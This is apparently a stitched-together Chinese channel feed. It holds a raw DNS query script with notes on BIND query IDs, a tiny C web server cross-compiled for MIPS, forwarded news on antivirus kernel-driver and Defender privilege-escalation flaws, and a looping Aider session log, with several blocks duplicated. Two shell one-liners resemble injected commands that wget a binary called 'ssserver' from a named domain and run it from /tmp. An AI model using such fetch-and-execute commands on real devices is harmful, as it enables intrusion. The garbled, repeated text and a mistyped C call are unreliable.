import socket
def q(d):
e = b'\x12\x34'
"""
A 16 bit identifier assigned by the program
程序分配的16位标识符
that generates any kind of query
This identifier is copied
the corresponding reply and can be used by the requester
to match replies to outstanding queries
RFC1035 section4.1.1
nslookup程序出自Debian软件包bind9-dnsutils
它的可执行文件路径是/usr/bin/nslookup
它的源代码文件路径是/bin/dig/nslookup.c(这是gitlab的路径)
在其中搜索字符串uint16(_t) 只有一个端口变量 所以我跳过了
port = (uint16_t)n
过了一年(度秒如年) 我注意到/usr/lib/x86_64-linux-gnu目录下有libdns-9.20.9-1-Debian.so文件
以及libisc-9.20.9-1-Debian.so文件
它们在gitlab上的路径分别为/lib/dns和/lib/isc/
文件分别为dispatch.c和random.c
在dispatch.c中搜索id 第4个在第98行
dns_messageid_t id;
但它还不是 继续搜索dns_messageid
第4个在第1416行
...
总之我认为它要么是指针idp所指向的值
要么是isc_random16()的返回值
resp->id = ((options & DNS_DISPATCHOPT_FIXEDID) != 0)
? *idp
: (dns_messageid_t)isc_random16()
如上
所以现在我可以在random.c中搜索isc_random16
isc_random16(void) {
isc__random_initialize();
return (uint16_t)next();
}
返回值是uint16_t类型的 而next不与说明
"""
h = b'\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00'
y = b''
for p in d.split('.'):
y += bytes([len(p)])+p.encode('utf-8')
y += b'\x00'
y += b'\x00\x01'
y += b'\x00\x01'
pkt = e + h + y
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(pkt, ('127.0.0.1', 53))
r=s.recvfrom(512)[0]
s.close()
b = r[slice(-4,None)]
return '.'.join(str(x) for x in b)
if __name__ == '__main__':
IP = q('bytecategory.com')
print(f"bytecategory.com\t{IP}")
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
int main() {
int f, d;
struct sockaddr_in v, c;
socklen_t client_len = sizeof(c);
char b[1024];
f = socket(AF_INET, SOCK_STREAM, 0);
int p = 1;
setsockp(f, SOL_SOCKET, SO_REUSEADDR, &p, sizeof(p));
memset(&v, 0, sizeof(v));
v.sin_family = AF_INET;
v.sin_addr.s_addr = INADDR_ANY;
v.sin_port = htons(80);
bind(f, (struct sockaddr *)&v, sizeof(v));
listen(f, 3);
daemon(1, 1);
while (1) {
if ((d = accept(f, (struct sockaddr *)&c, &client_len)) < 0) {
continue;
}
int s = read(d, b, 1024);
if (s < 0) {
close(d);
continue;
}
const char *r = "HTTP/1.1 200 OK\r\n\r\n<p style='text-align: center;color: pink;font-size: 24px'>cyw,我喜欢你</p>";
send(d, r, strlen(r), 0);
close(d);
}
close(f);
return 0;
}
mips-linux-gnu-gcc -march=mips2 -EB -mtune=mips2 -mabi=32 -mhard-float -static -O0 -o E E.c
bytecat
#include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <fcntl.h> #include <string.h> int main() { int f, d; struct sockaddr_in v, c; socklen_t client_len = sizeof(c); char…
https://github[.]com/bytecategory/gfw/blob/main/mtd11.bin
print(
'''\033 //
\\\\ //
\\\\ //
##DDDDDDDDDDDDDDDDDDDDDD##
## DDDDDDDDDDDDDDDDDDDD ## ________ ___ ___ ___ ________ ___ ___ ___
## hh hh ## |\\ __ \\ |\\ \\ |\\ \\ |\\ \\ |\\ __ \\ |\\ \\ |\\ \\ |\\ \\
## hh // \\\\ hh ## \\ \\ \\|\\ /_\\ \\ \\\\ \\ \\ \\ \\ \\\\ \\ \\|\\ /_\\ \\ \\\\ \\ \\ \\ \\ \\
## hh // \\\\ hh ## \\ \\ __ \\\\ \\ \\\\ \\ \\ \\ \\ \\\\ \\ __ \\\\ \\ \\\\ \\ \\ \\ \\ \\
## hh hh ## \\ \\ \\|\\ \\\\ \\ \\\\ \\ \\____ \\ \\ \\\\ \\ \\|\\ \\\\ \\ \\\\ \\ \\____ \\ \\ \\
## hh wwww hh ## \\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\
## hh hh ## \\|_______| \\|__| \\|_______| \\|__| \\|_______| \\|__| \\|_______| \\|__|
## MMMMMMMMMMMMMMMMMMMM ##
##MMMMMMMMMMMMMMMMMMMMMM##
\\/ \\/
\033''',
end='')
msntp -V -c 1 -r time[.]nist[.]gov&cd /tmp;chmod +x ./ssserver;./ssserver | dd of=.txt > /dev/null
/bin/sh -c ntpd -dnqp time[.]nist[.]gov;cd /zconf;sleep 114514;wget bytecategory[.]com/ssserver > /dev/null
Forwarded from T00ls公开频道 | T00ls.com | 低调求发展,潜心习安全! (T00lsBot)
安全研究员在Microsoft Defender中发现漏洞 与微软产生矛盾后公开漏洞(作者:匿名)
研究人员在 Microsoft Defender 中发现安全漏洞,可以借助这款系统级安全软件本身进行权限提升。但研究人员与 MSRC 团队之间出现矛盾,这导致研究人员直接公布漏洞,漏洞公布后已经有黑客开始尝试利用漏洞发起攻击 --- 利用 Defender 作为提权跳板。
研究人员在 Microsoft Defender 中发现安全漏洞,可以借助这款系统级安全软件本身进行权限提升。但研究人员与 MSRC 团队之间出现矛盾,这导致研究人员直接公布漏洞,漏洞公布后已经有黑客开始尝试利用漏洞发起攻击 --- 利用 Defender 作为提权跳板。
Forwarded from 科技圈🎗在花频道📮
国产主流杀毒软件内核驱动曝高危漏洞
安全研究员 Patrick Saif 披露金山毒霸与 360安全卫士的内核驱动存在高危漏洞。金山毒霸防火墙驱动因 IOCTL 尺寸计算错误引发内核堆溢出,攻击者无需认证即可破坏内核池元数据,实现任意代码执行。360安全卫士反 Rootkit 驱动风险更高,其签名校验可通过进程空洞绕过,硬编码的 AES 密钥允许攻击者执行任意内核读写及终止受 PPL 保护的进程。两者均持有合法数字签名,极易被用于 BYOVD 攻击。
目前两个漏洞已提交至 LOLDrivers 数据库,均未获 CVE 编号且不在 HVCI 屏蔽名单中。攻击者利用这些漏洞可从普通用户提权至 SYSTEM,绕过 KASLR 并窃取内核凭据,甚至修改内核回调表隐藏恶意行为。鉴于涉事驱动具备 EV 或 WHQL 签名,攻击者无需在目标机器安装软件即可加载恶意载荷。在厂商发布补丁前,企业需将相关驱动哈希加入 EDR 检测规则以防范内核级攻击。
weezerOSINT | Github(1,2)
🌸 在花频道|茶馆讨论|投稿通道
安全研究员 Patrick Saif 披露金山毒霸与 360安全卫士的内核驱动存在高危漏洞。金山毒霸防火墙驱动因 IOCTL 尺寸计算错误引发内核堆溢出,攻击者无需认证即可破坏内核池元数据,实现任意代码执行。360安全卫士反 Rootkit 驱动风险更高,其签名校验可通过进程空洞绕过,硬编码的 AES 密钥允许攻击者执行任意内核读写及终止受 PPL 保护的进程。两者均持有合法数字签名,极易被用于 BYOVD 攻击。
目前两个漏洞已提交至 LOLDrivers 数据库,均未获 CVE 编号且不在 HVCI 屏蔽名单中。攻击者利用这些漏洞可从普通用户提权至 SYSTEM,绕过 KASLR 并窃取内核凭据,甚至修改内核回调表隐藏恶意行为。鉴于涉事驱动具备 EV 或 WHQL 签名,攻击者无需在目标机器安装软件即可加载恶意载荷。在厂商发布补丁前,企业需将相关驱动哈希加入 EDR 检测规则以防范内核级攻击。
weezerOSINT | Github(1,2)
🌸 在花频道|茶馆讨论|投稿通道
Plug me If you can : Exploiting USB Printer Drivers in Windows | Enki White Hat
https://www.enki.co.kr/en/media-center/blog/plug-me-if-you-can-exploiting-usb-printer-drivers-in-windows
https://www.enki.co.kr/en/media-center/blog/plug-me-if-you-can-exploiting-usb-printer-drivers-in-windows
www.enki.co.kr
Plug me If you can : Exploiting USB Printer Drivers in Windows | Enki White Hat
Windows loads the appropriate kernel driver by interpreting USB Descriptor when a USB device is connected. If the data sent by the device is not properly validated, this can lead to kernel-level vulnerabilities.
Local Privilege Escalation (LPE) via USB is…
Local Privilege Escalation (LPE) via USB is…
C:\Windows\System32>aider --model openrouter/x-ai/grok-4.20-multi-agent
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Aider v0.86.2
Model: openrouter/x-ai/grok-4.20-multi-agent with whole edit format
Git repo: none
Repo-map: disabled
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
> hello
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
供需要修改的代码内容以及你想要做的更改(例如“将问候语改得更随意”),这样我才能理解请求并按照要求输出文件修改。如果只是
打招呼,请告诉我下一步需要做什么。
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
Tokens: 607 sent, 127 received. Cost: $0.0020 message, $0.0020 session.
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>
太拼了 为了耗我的money这么玩是吧
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Aider v0.86.2
Model: openrouter/x-ai/grok-4.20-multi-agent with whole edit format
Git repo: none
Repo-map: disabled
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
> hello
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
供需要修改的代码内容以及你想要做的更改(例如“将问候语改得更随意”),这样我才能理解请求并按照要求输出文件修改。如果只是
打招呼,请告诉我下一步需要做什么。
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
Tokens: 607 sent, 127 received. Cost: $0.0020 message, $0.0020 session.
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>
太拼了 为了耗我的money这么玩是吧